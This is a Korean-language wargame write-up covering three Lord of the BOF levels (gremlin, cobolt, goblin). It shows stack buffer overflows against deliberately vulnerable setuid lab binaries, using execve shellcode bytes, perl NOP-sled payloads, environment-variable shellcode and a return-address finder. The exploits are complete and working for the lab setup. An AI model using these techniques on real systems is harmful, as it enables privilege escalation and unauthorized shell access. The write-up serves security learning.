[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x37\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????7?

bash$ my-pass        //결국엔 됬어요.

euid = 504


아하하하하하하 굉장히 많은것을 배웠습니다

gdb에 대한 공포감도 줄이고, 알아낸게 많은 것 같습니다.

중간중간에 좀 안맞지만 (하도 오랫동안 삽질해서 날아간게 좀 많아요) 그래도 뼈대는 있네여. 고치면서 본건데 기억안나는것도 많고,,, 다음에 시간나면 다시 해봐야겠습니다.

이거 푸는동안 조언주신 많은 분들께 감사합니다!

기분좋네요ㅎㅎ


NOTES:


버퍼의 크기는 44

48번째 바이트는 \xbf여야 한다


코어는 해당 프로그램이 관리자 권한이 아닐 때 덤프가 떠지지 않는다

음 망했어


0xbffffc48

0xbffffc65

          28

          34

          35


48번째 바이트가 \xbf여야 하니까 3바이트 빼면 45바이트니까 환경변수 4바이트 nop 41바이트

gdb에서 \xff는 인식되지 않는다아앙ㅇ아ㅏㅇ


ㅋㅋ 정신나간 노트가 많습니다. 저 주소값들 어쩔꺼야;;

그래도 푸니까 속 시원하네여. 삽질한 성과가 있는것 같습니다ㅋㅋ


/* 1. bash2를 사용해 \xff도 인식되도록 합니다*/

[cobolt@localhost cobolt]$ bash2


/*2. 환경변수를 생성합니다.*/

[cobolt@localhost cobolt]$ export COBOLT=$(perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')

[cobolt@localhost cobolt]$ env //잘들어갔나 확인

PWD=/home/cobolt

REMOTEHOST=192.168.0.1

HOSTNAME=localhost.localdomain

LESSOPEN=|/usr/bin/lesspipe.sh %s

USER=cobolt

LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:

MACHTYPE=i386-redhat-linux-gnu

MAIL=/var/spool/mail/cobolt

INPUTRC=/etc/inputrc

BASH_ENV=/home/cobolt/.bashrc

LANG=en_US

DISPLAY=192.168.0.1:0.0

LOGNAME=cobolt

SHLVL=2

USERNAME=

SHELL=/bin/bash

HOSTTYPE=i386

HISTSIZE=1000

OSTYPE=linux-gnu

TERM=xterm

HOME=/home/cobolt

PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/cobolt/bin

COBOLT=j

        X?Rh//shh/bin??S?訴€  //굿

_=/usr/bin/env


/* 3. 환경변수의 주소를 찾습니다 */

[cobolt@localhost cobolt]$ vi getenv.c

[cobolt@localhost cobolt]$ cat getenv.c

#include <stdio.h>
#include <stdlib.h>

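/*
 * Print the address returned by getenv() for the variable named in argv[1].
 *
 * argv[1]: name of the environment variable to look up.
 * Output:  the pointer formatted with "%p" followed by a newline; getenv()
 *          returns NULL when the variable is unset, and that is printed too.
 * Returns 0 on success, 1 when no variable name was given.
 */
int main(int argc, char *argv[]){
    if (argc < 2) {
        /* getenv(NULL) is undefined behaviour; report the usage error instead. */
        fprintf(stderr, "usage: getenv NAME\n");
        return 1;
    }
    /* %p requires a void * argument. */
    printf("%p\n", (void *)getenv(argv[1]));
    return 0;
}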

[cobolt@localhost cobolt]$ gcc getenv.c -o getenv

[cobolt@localhost cobolt]$ ./getenv COBOLT

0xbfffffd0  //주소

[cobolt@localhost cobolt]$ (perl -e 'print "\x90"x20, "\xd0\xff\xff\xbf"';cat)|./goblin 

/*stdin을 공격할 수 있게 만드는(?) 코드를 추가시킵니다.*/

my-pass

?????????????????????퓅y-pass

my-pass

euid = 503


처음에는 그냥 전 단계같이 환경변수만 넣었더니 안되더라구요. 그래서 구글링하다가 stdin을 공격하는 코드중 cat가 있어 넣어봤습니다. 그래도 안되서 아는형께 물어보니 파이프를 사용해 넣는거라서 앞의 $표시는 필요없다고 해요. 


이번에 배운것:

-cat를 사용할땐 앞에 달러표시를 지운다

-달러표시는 커맨드라인으로 넘겨줄때, 파이프는 괄호만

-환경변수의 주소를 알아낼때, 환경변수가 프로그램에 밀리므로 나오는 주소가 프로그램명에 따라 다르다

-xshell♥


노트쓴건 없네요.. 딱히..



/* 1. gremlin으로 로그인 하고 난 뒤 내용물을 봅시다.*/

[gremlin@localhost gremlin]$ ls -al

total 156

drwx------    2 gremlin  gremlin      4096 Oct 26 16:06 .

drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..

-rw-------    1 gremlin  gremlin      8903 Oct 26 11:39 .bash_history

-rw-r--r--    1 gremlin  gremlin        24 Feb 26  2010 .bash_logout

-rw-r--r--    1 gremlin  gremlin       230 Feb 26  2010 .bash_profile

-rw-r--r--    1 gremlin  gremlin       124 Feb 26  2010 .bashrc

-rwxr-xr-x    1 gremlin  gremlin       333 Feb 26  2010 .emacs

-rw-r--r--    1 gremlin  gremlin      3394 Feb 26  2010 .screenrc

-rwxrwxr-x    1 gremlin  gremlin     11883 Oct 26 03:31 a.out

-rw-rw-r--    1 gremlin  gremlin       291 Oct 25 22:40 cobalt.c

-rwsr-sr-x    1 cobolt   cobolt      11970 Feb 26  2010 cobolt

-rw-r--r--    1 gremlin  gremlin       291 Mar 29  2010 cobolt.c

-rw-------    1 gremlin  gremlin     61440 Oct 25 22:41 core

-rwxrwxr-x    1 gremlin  gremlin     11842 Oct 26 16:06 getenv

-rw-rw-r--    1 gremlin  gremlin        97 Oct 26 16:05 getenv.c

-rw-rw-r--    1 gremlin  gremlin       143 Oct 26 03:31 whereis.c


COBOLT:

[gremlin@localhost gremlin]$ cat cobolt.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - cobolt

        - small buffer

*/


/*
 * Entry point of the "cobolt" challenge binary (intentionally vulnerable
 * wargame source, reproduced as-is).
 *
 * Requires at least one argument, copies argv[1] into a 16-byte stack
 * buffer with strcpy() and echoes it.
 *
 * Defects visible in this listing:
 *  - strcpy() has no length bound, so any argv[1] longer than 15 bytes
 *    overflows the 16-byte `buffer` (stack overflow);
 *  - printf/exit/strcpy are called with no header included at all
 *    (implicit declarations);
 *  - main declares an int return type but never returns a value.
 */
int main(int argc, char *argv[])

{

    char buffer[16];

    if(argc < 2){ /* argv[1] is required below */

        printf("argv error\n");

        exit(0);

    }

    strcpy(buffer, argv[1]); /* unbounded copy into the 16-byte buffer */

    printf("%s\n", buffer);

}

/*버퍼가 작습니다. 여기서 메모리는 '버퍼 16바이트, sfp 4바이트, 리턴어드레스 4바이트'로 이루어져있다고 가정할수 있습니다.*/


/* 2. export명령어로 환경변수를 만듭니다. 여기서 print문도 꼭 포함하셔야 합니다*/

[gremlin@localhost gremlin]$ export GREMLIN=`perl -e 'print"\x6a\x0b\x58\x99\x5

2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`


/* 3. env명령어로 환경변수가 잘 들어갔는지 봅니다.*/

[gremlin@localhost gremlin]$ env

PWD=/home/gremlin

REMOTEHOST=192.168.0.1

HOSTNAME=localhost.localdomain

LESSOPEN=|/usr/bin/lesspipe.sh %s

USER=gremlin

LS_COLORS=

MACHTYPE=i386-redhat-linux-gnu

MAIL=/var/spool/mail/gremlin

INPUTRC=/etc/inputrc

BASH_ENV=/home/gremlin/.bashrc

GREMLIN=j

         X셊h//shh/bin됥RS됣?  //굿

LANG=en_US

LOGNAME=gremlin

SHLVL=2

USERNAME=

SHELL=/bin/bash

HOSTTYPE=i386

HISTSIZE=1000

OSTYPE=linux-gnu

TERM=ansi

HOME=/home/gremlin

PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gremlin/bin

COBOLT=j

        X셊h//shh/bin됥RS됣?

_=/usr/bin/env


/* 4. 환경변수의 주소를 알아냅니다.*/

[gremlin@localhost gremlin]$ cat getenv.c

#include <stdio.h>
#include <stdlib.h>

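/*
 * Print the address returned by getenv() for the variable named in argv[1].
 *
 * argv[1]: name of the environment variable to look up.
 * Output:  the pointer formatted with "%p" followed by a newline; getenv()
 *          returns NULL when the variable is unset, and that is printed too.
 * Returns 0 on success, 1 when no variable name was given.
 */
int main(int argc, char *argv[]){
    if (argc < 2) {
        /* getenv(NULL) is undefined behaviour; report the usage error instead. */
        fprintf(stderr, "usage: getenv NAME\n");
        return 1;
    }
    /* %p requires a void * argument. */
    printf("%p\n", (void *)getenv(argv[1]));
    return 0;
}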

[gremlin@localhost gremlin]$ ./getenv GREMLIN

0xbffffee7 //이게 리턴어드레스가 됩니다


/* 5. 필요한 양의 nop를 넣고 리턴어드레스를 넣습니다.*/

[gremlin@localhost gremlin]$ ./cobolt `perl -e 'print"\x90"x20, "\xe7\xfe\xff\x

bf"'`

릱릱릱릱릱릱릱릱릱릱澳

풺ash$ my-pass


역시 이번에도 달고나 문서가 많은 도움이 되었습니다.

기본은 조금씩 감이 잡히네요. 그래서 그런지 지난번보다는 덜 헤맨것같아요.


NOTES:

GREMLIN=  0xbffffee7

"\xe7\xfe\xff\xbf"'`

buffer=16

nop 20, ret 4



LoB를 푸시기 전에 꼭 이 링크로 들어가 버퍼오버플로우 문서를 읽으시기 바랍니다. 엄청난 도움을 주거든요.

http://wowhacker.com/board.php?bid=174&bs_type=&bs_str=&cate=0&pg=0&mode=view&uid=154748


   LoB 설명/파일 받는곳


그럼, 바로 풀이해보겠습니다.



gate로 로그인 한 후에, ls -al을 하니 파일들이 보입니다. (a.out 과 gramlin.c는 무시하셔도 됩니다)

우선 레벨 이름이 gremlin이니 gremlin.c를 구경해보겠습니다.

달고나 문서를 열심히 보셨다면 낯익으실겁니다. 66쪽쯤을 참고하였는데요, 

버퍼는 256바이트이고, 더미는 없으니 바로 sfp 4바이트와 리턴어드레스 4바이트가 있을테니 260바이트를 쉘코드와 NOP로 채우고, 리턴어드레스를 넣는 방법을 시도했습니다.

(쉘코드는 제가 작성하지 않았습니다)


 


릱릱! 이게 쉘코드를 땄을때의 화면입니다.

저는 펄로 했지만 파이썬도 똑같아요. -e 대신 -c를 사용하고, 곱셈 부호 대신 *를 사용하고, 쉼표 대신 +를 쓴다는 게 다르지만..

모두들 재밌는 lob하십쇼ㅋㅋ


풀이중 제가 적은 노트:

Shellcode=23 bytes

그러므로 NOP는 237bytes

esp=0xbffffd7c

"\x7c\xfd\xff\xbf"

